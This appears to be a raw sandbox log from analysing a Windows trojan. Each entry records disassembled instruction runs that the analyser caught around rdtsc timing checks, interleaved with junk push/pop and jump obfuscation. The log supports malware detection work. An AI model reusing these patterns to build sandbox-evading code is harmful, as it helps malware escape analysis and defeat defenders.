Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0AFC second address: 4DB0B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0B14 second address: 4DB0B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cl, AEh 0x0000000e mov al, bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dx, 9F08h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DB0B35 second address: 4DB0B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E30782 second address: 4E3079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E3079F second address: 4E307FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FABC90CD75Eh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c call 00007FABC90CD75Ch 0x00000021 pop esi 0x00000022 movsx edx, si 0x00000025 popad 0x00000026 movzx ecx, bx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FABC90CD762h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E307FB second address: 4E30822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC9471C35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E2090E second address: 4E20914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20914 second address: 4E20942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FABC9471C30h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20942 second address: 4E20946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20946 second address: 4E2094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E2094C second address: 4E209EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC90CD766h 0x0000001a xor eax, 3D6D94F8h 0x00000020 jmp 00007FABC90CD75Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FABC90CD768h 0x0000002c jmp 00007FABC90CD765h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007FABC90CD75Eh 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov cx, dx 0x00000041 call 00007FABC90CD769h 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC00A8 second address: 4DC00AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC00AC second address: 4DC00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC00B0 second address: 4DC00B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC00B6 second address: 4DC00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD761h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC00CB second address: 4DC00CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20B47 second address: 4E20B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FABC90CD75Ah 0x0000000f push eax 0x00000010 jmp 00007FABC90CD75Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20B6D second address: 4E20B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C31h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20B83 second address: 4E20BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007FABC90CD75Ah 0x00000012 pop eax 0x00000013 mov di, 9F86h 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007FABC90CD767h 0x0000001e and ah, 0000000Eh 0x00000021 jmp 00007FABC90CD769h 0x00000026 popfd 0x00000027 popad 0x00000028 push dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FABC90CD75Dh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20BF4 second address: 4E20C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 483B3CD2h 0x00000008 mov bx, 541Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push dword ptr [ebp+08h] 0x00000012 jmp 00007FABC9471C35h 0x00000017 push 440B3103h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FABC9471C39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20C3D second address: 4E20C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20C52 second address: 4E20C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20C62 second address: 4E20CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 440A3101h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 pushfd 0x00000016 jmp 00007FABC90CD765h 0x0000001b sub ax, C7C6h 0x00000020 jmp 00007FABC90CD761h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20CA5 second address: 4E20CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20CAB second address: 4E20CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20CAF second address: 4E20CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20CD5 second address: 4E20CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E20CE7 second address: 4E20D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b jmp 00007FABC9471C37h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FABC9471C35h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2C02C second address: B2C030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2C030 second address: B2C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD027F second address: 4DD02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Fh 0x00000009 sub esi, 69D5739Eh 0x0000000f jmp 00007FABC90CD769h 0x00000014 popfd 0x00000015 mov ah, 43h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FABC90CD75Ah 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC90CD767h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD02DC second address: 4DD0315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FABC9471C33h 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0315 second address: 4DD031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD031B second address: 4DD031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD031F second address: 4DD0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FABC90CD765h 0x00000012 jmp 00007FABC90CD760h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0352 second address: 4DD03B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C31h 0x00000009 sbb eax, 4211DA06h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 call 00007FABC9471C30h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e call 00007FABC9471C29h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx ecx, di 0x00000029 call 00007FABC9471C2Fh 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD03B3 second address: 4DD03BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD03BA second address: 4DD0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a mov ch, 84h 0x0000000c pop ebx 0x0000000d call 00007FABC9471C34h 0x00000012 jmp 00007FABC9471C32h 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e call 00007FABC9471C2Eh 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 jmp 00007FABC9471C31h 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007FABC9471C31h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 jmp 00007FABC9471C31h 0x0000003c pop eax 0x0000003d jmp 00007FABC9471C2Eh 0x00000042 push 015CA5D5h 0x00000047 pushad 0x00000048 call 00007FABC9471C37h 0x0000004d push esi 0x0000004e pop ebx 0x0000004f pop eax 0x00000050 mov bx, 26E8h 0x00000054 popad 0x00000055 add dword ptr [esp], 75EA082Bh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push esi 0x00000060 pop edi 0x00000061 mov dx, ax 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0483 second address: 4DD0503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD767h 0x00000009 sub cx, 8EDEh 0x0000000e jmp 00007FABC90CD769h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f jmp 00007FABC90CD75Ah 0x00000024 nop 0x00000025 jmp 00007FABC90CD760h 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d jmp 00007FABC90CD75Ch 0x00000032 pop ecx 0x00000033 movsx edx, si 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 60A5895Ah 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0503 second address: 4DD0509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0651 second address: 4DD06BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Ah 0x00000009 adc ecx, 0B2920F8h 0x0000000f jmp 00007FABC90CD75Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FABC90CD768h 0x0000001b sub ecx, 4F087B58h 0x00000021 jmp 00007FABC90CD75Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c mov edx, eax 0x0000002e mov si, 5A07h 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FABC90CD75Fh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06BC second address: 4DD06C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06C2 second address: 4DD06D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06D1 second address: 4DD06F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 64h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06F8 second address: 4DD06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD06FD second address: 4DD0703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0703 second address: 4DD0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0707 second address: 4DD0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [7751B370h] 0x00000010 jmp 00007FABC9471C2Eh 0x00000015 xor dword ptr [ebp-08h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FABC9471C2Ch 0x00000020 or ah, 00000008h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a pop ebx 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007FABC9471C32h 0x00000032 mov ecx, 38DC0A81h 0x00000037 popad 0x00000038 popad 0x00000039 xor eax, ebp 0x0000003b pushad 0x0000003c mov edx, 481EC4FEh 0x00000041 mov di, 330Ah 0x00000045 popad 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FABC9471C2Dh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0788 second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD078E second address: 4DD07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FABC9471C2Fh 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC9471C34h 0x0000001a sub ah, 00000058h 0x0000001d jmp 00007FABC9471C2Bh 0x00000022 popfd 0x00000023 mov di, si 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07E0 second address: 4DD07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07E4 second address: 4DD07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD07EA second address: 4DD0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FABC90CD760h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FABC90CD760h 0x00000019 test eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0832 second address: 4DD0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0836 second address: 4DD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD083A second address: 4DD0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0840 second address: 4DD08DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC3B71CC22h 0x0000000f jmp 00007FABC90CD760h 0x00000014 sub eax, eax 0x00000016 jmp 00007FABC90CD761h 0x0000001b mov dword ptr [ebp-20h], eax 0x0000001e jmp 00007FABC90CD75Eh 0x00000023 mov ebx, dword ptr [esi] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FABC90CD75Eh 0x0000002c add si, 0968h 0x00000031 jmp 00007FABC90CD75Bh 0x00000036 popfd 0x00000037 mov cx, 835Fh 0x0000003b popad 0x0000003c mov dword ptr [ebp-24h], ebx 0x0000003f jmp 00007FABC90CD762h 0x00000044 test ebx, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ax, dx 0x0000004c mov ch, dl 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD08DA second address: 4DD08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD08EC second address: 4DD0927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FAC3B71CAD6h 0x00000011 jmp 00007FABC90CD766h 0x00000016 cmp ebx, FFFFFFFFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 567468A0h 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0927 second address: 4DD093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD093C second address: 4DD027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAC3B71CA8Dh 0x0000000d jne 00007FABC90CD779h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 00965678h 0x00000043 jne 00007FABC90CD740h 0x00000045 push esi 0x00000046 call 00007FABC90CDFC3h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007FABCD580ABFh 0x00000056 mov edi, edi 0x00000058 jmp 00007FABC90CD75Eh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FABC90CD767h 0x00000065 rdtsc
